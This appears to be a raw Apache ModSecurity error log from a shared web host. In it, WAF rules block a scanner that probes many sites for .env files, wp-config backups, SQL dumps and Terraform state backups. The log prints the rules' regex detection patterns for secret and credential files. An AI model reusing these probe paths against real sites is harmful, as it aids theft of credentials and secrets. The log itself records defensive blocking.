[Tue May 26 15:32:53.173530 2026] [security2:error] [pid 724639:tid 724851] [client 195.178.110.199:47304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/server/.env"] [unique_id "ahVvzRKJRbiNp3eWdT1u0QAAANc"]
[Tue May 26 15:32:53.227120 2026] [security2:error] [pid 724639:tid 724876] [client 185.191.171.11:22588] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVvzRKJRbiNp3eWdT1u0gAAAPA"]
[Tue May 26 15:32:53.227260 2026] [security2:error] [pid 724639:tid 724876] [client 185.191.171.11:22588] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVvzRKJRbiNp3eWdT1u0gAAAPA"]
[Tue May 26 15:32:53.514947 2026] [security2:error] [pid 724639:tid 724770] [client 195.178.110.199:47302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/server/api/.env"] [unique_id "ahVvzRKJRbiNp3eWdT1u7QAAAIY"]
[Tue May 26 15:32:53.562655 2026] [security2:error] [pid 724639:tid 724843] [client 195.178.110.199:47310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/server/backend/.env"] [unique_id "ahVvzRKJRbiNp3eWdT1u7wAAAM8"]
[Tue May 26 15:32:53.671194 2026] [security2:error] [pid 724639:tid 724803] [client 195.178.110.199:47304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/shared/.env"] [unique_id "ahVvzRKJRbiNp3eWdT1u9wAAAKc"]
[Tue May 26 15:32:53.755723 2026] [security2:error] [pid 724639:tid 724798] [client 195.178.110.199:50524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/shop/.env"] [unique_id "ahVvzRKJRbiNp3eWdT1u_AAAAKI"]
[Tue May 26 15:32:53.764034 2026] [security2:error] [pid 724639:tid 724863] [client 195.178.110.199:47286] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/service/.env"] [unique_id "ahVvzRKJRbiNp3eWdT1u_QAAAOM"]
[Tue May 26 15:32:53.771203 2026] [security2:error] [pid 724639:tid 724791] [client 195.178.110.199:47214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/services/.env"] [unique_id "ahVvzRKJRbiNp3eWdT1u_gAAAJs"]
[Tue May 26 15:32:54.241787 2026] [security2:error] [pid 724639:tid 724811] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/src/.env"] [unique_id "ahVvzhKJRbiNp3eWdT1vHAAAAK8"]
[Tue May 26 15:32:54.281059 2026] [security2:error] [pid 724639:tid 724774] [client 195.178.110.199:47144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/staging/.env"] [unique_id "ahVvzhKJRbiNp3eWdT1vHQAAAIo"]
[Tue May 26 15:32:54.346806 2026] [security2:error] [pid 724639:tid 724819] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvzRKJRbiNp3eWdT1vCgAAALc"]
[Tue May 26 15:32:54.517676 2026] [security2:error] [pid 724639:tid 724788] [client 195.178.110.199:38108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/stg/.env"] [unique_id "ahVvzhKJRbiNp3eWdT1vMQAAAJg"]
[Tue May 26 15:32:54.547792 2026] [security2:error] [pid 724639:tid 724827] [client 195.178.110.199:47182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/srv/.env"] [unique_id "ahVvzhKJRbiNp3eWdT1vMwAAAL8"]
[Tue May 26 15:32:54.692436 2026] [security2:error] [pid 724639:tid 724859] [client 195.178.110.199:47200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/stage/.env"] [unique_id "ahVvzhKJRbiNp3eWdT1vNgAAAN8"]
[Tue May 26 15:32:54.826053 2026] [security2:error] [pid 724639:tid 724881] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/stripe/.env"] [unique_id "ahVvzhKJRbiNp3eWdT1vOQAAAPU"]
[Tue May 26 15:32:54.945593 2026] [cgid:error] [pid 724639:tid 724890] [client 195.178.110.199:47160] AH01264: stderr from /home2/jhonwy9v/stvica.com/sysinfo.cgi: script not found or unable to stat
[Tue May 26 15:32:55.146779 2026] [security2:error] [pid 724639:tid 724861] [client 195.178.110.199:47192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/test/.env"] [unique_id "ahVvzxKJRbiNp3eWdT1vVwAAAOE"]
[Tue May 26 15:32:55.267828 2026] [security2:error] [pid 724639:tid 724820] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/user/.env"] [unique_id "ahVvzxKJRbiNp3eWdT1vXQAAALg"]
[Tue May 26 15:32:55.375910 2026] [security2:error] [pid 724639:tid 724855] [client 195.178.110.199:47214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/v1/.env"] [unique_id "ahVvzxKJRbiNp3eWdT1vawAAANs"]
[Tue May 26 15:32:55.423539 2026] [security2:error] [pid 724639:tid 724876] [client 195.178.110.199:47200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVvzxKJRbiNp3eWdT1vbwAAAPA"]
[Tue May 26 15:32:55.493241 2026] [security2:error] [pid 724639:tid 724857] [client 195.178.110.199:47144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/v3/.env"] [unique_id "ahVvzxKJRbiNp3eWdT1vcQAAAN0"]
[Tue May 26 15:32:55.666360 2026] [security2:error] [pid 724639:tid 724793] [client 195.178.110.199:38108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/v2/.env"] [unique_id "ahVvzxKJRbiNp3eWdT1vgQAAAJ0"]
[Tue May 26 15:32:55.691339 2026] [security2:error] [pid 724639:tid 724870] [client 195.178.110.199:47286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/test.php"] [unique_id "ahVvzxKJRbiNp3eWdT1vggAAAOo"]
[Tue May 26 15:32:56.043871 2026] [security2:error] [pid 724639:tid 724802] [client 195.178.110.199:47192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/var/www/.env"] [unique_id "ahVv0BKJRbiNp3eWdT1vkwAAAKY"]
[Tue May 26 15:32:56.047960 2026] [security2:error] [pid 724639:tid 724827] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvzxKJRbiNp3eWdT1vegAAAL8"]
[Tue May 26 15:32:56.591433 2026] [security2:error] [pid 724639:tid 724778] [client 195.178.110.199:47214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/var/www/html/.env"] [unique_id "ahVv0BKJRbiNp3eWdT1vsQAAAI4"]
[Tue May 26 15:32:56.660994 2026] [security2:error] [pid 724639:tid 724771] [client 195.178.110.199:47156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/web/.env"] [unique_id "ahVv0BKJRbiNp3eWdT1vuAAAAIc"]
[Tue May 26 15:32:56.943034 2026] [security2:error] [pid 724639:tid 724856] [client 195.178.110.199:47302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-config.php.old"] [unique_id "ahVv0BKJRbiNp3eWdT1vwwAAANw"]
[Tue May 26 15:32:57.259992 2026] [security2:error] [pid 724639:tid 724892] [client 195.178.110.199:47240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/website/.env"] [unique_id "ahVv0RKJRbiNp3eWdT1v1QAAAQA"]
[Tue May 26 15:32:57.361425 2026] [security2:error] [pid 724639:tid 724794] [client 195.178.110.199:47192] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-config.php.bak"] [unique_id "ahVv0RKJRbiNp3eWdT1v1gAAAJ4"]
[Tue May 26 15:32:57.369638 2026] [security2:error] [pid 724639:tid 724883] [client 195.178.110.199:50524] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-config.php.new"] [unique_id "ahVv0RKJRbiNp3eWdT1v1wAAAPc"]
[Tue May 26 15:32:57.447315 2026] [security2:error] [pid 724639:tid 724846] [client 195.178.110.199:47240] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVv0RKJRbiNp3eWdT1v2AAAANI"]
[Tue May 26 15:32:57.665407 2026] [security2:error] [pid 724639:tid 724873] [client 195.178.110.199:47200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-config.php"] [unique_id "ahVv0RKJRbiNp3eWdT1v4QAAAO0"]
[Tue May 26 15:32:59.064136 2026] [security2:error] [pid 724639:tid 724771] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv0hKJRbiNp3eWdT1v-AAAAIc"]
[Tue May 26 15:32:59.878957 2026] [security2:error] [pid 724639:tid 724769] [client 190.185.108.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVv0xKJRbiNp3eWdT1wKAAAAIU"], referer: https://www.anujtradingco.com/
[Tue May 26 15:33:00.894774 2026] [security2:error] [pid 724639:tid 724783] [client 190.185.108.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVv1BKJRbiNp3eWdT1wRwAAAJM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444431&moderation-hash=db854aec872b4e8b0761d9bdf145f418
[Tue May 26 15:33:01.465940 2026] [security2:error] [pid 724639:tid 724797] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv1RKJRbiNp3eWdT1wVAAAAKE"]
[Tue May 26 15:33:02.308151 2026] [security2:error] [pid 724639:tid 724837] [client 223.123.35.47:62449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVv1RKJRbiNp3eWdT1wbgAAAMk"]
[Tue May 26 15:33:02.308388 2026] [security2:error] [pid 724639:tid 724837] [client 223.123.35.47:62449] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVv1RKJRbiNp3eWdT1wbgAAAMk"]
[Tue May 26 15:33:03.251398 2026] [security2:error] [pid 724639:tid 724785] [client 190.185.108.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVv1xKJRbiNp3eWdT1wjQAAAJU"], referer: https://anujtradingco.com
[Tue May 26 15:33:03.890436 2026] [security2:error] [pid 724639:tid 724861] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv1xKJRbiNp3eWdT1wmQAAAOE"]
[Tue May 26 15:33:06.376913 2026] [security2:error] [pid 724639:tid 724881] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv2RKJRbiNp3eWdT1w7QAAAPU"]
[Tue May 26 15:33:08.429651 2026] [security2:error] [pid 724639:tid 724815] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv3BKJRbiNp3eWdT1xMwAAALM"]
[Tue May 26 15:33:10.644401 2026] [security2:error] [pid 724639:tid 724811] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv3hKJRbiNp3eWdT1xcQAAAK8"]
[Tue May 26 15:33:12.174738 2026] [proxy:error] [pid 724639:tid 724770] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:33:12.174840 2026] [proxy_http:error] [pid 724639:tid 724770] [client 205.210.31.167:57938] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:33:12.175488 2026] [proxy:error] [pid 724639:tid 724770] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:33:12.175573 2026] [proxy_http:error] [pid 724639:tid 724770] [client 205.210.31.167:57938] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:33:12.769920 2026] [security2:error] [pid 724639:tid 724888] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVv4BKJRbiNp3eWdT1xnwAAAPw"]
[Tue May 26 15:33:12.832696 2026] [security2:error] [pid 724639:tid 724806] [client 142.248.80.222:20660] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "makwasi.com"] [uri "/app/.env"] [unique_id "ahVv4BKJRbiNp3eWdT1xtQAAAKo"]
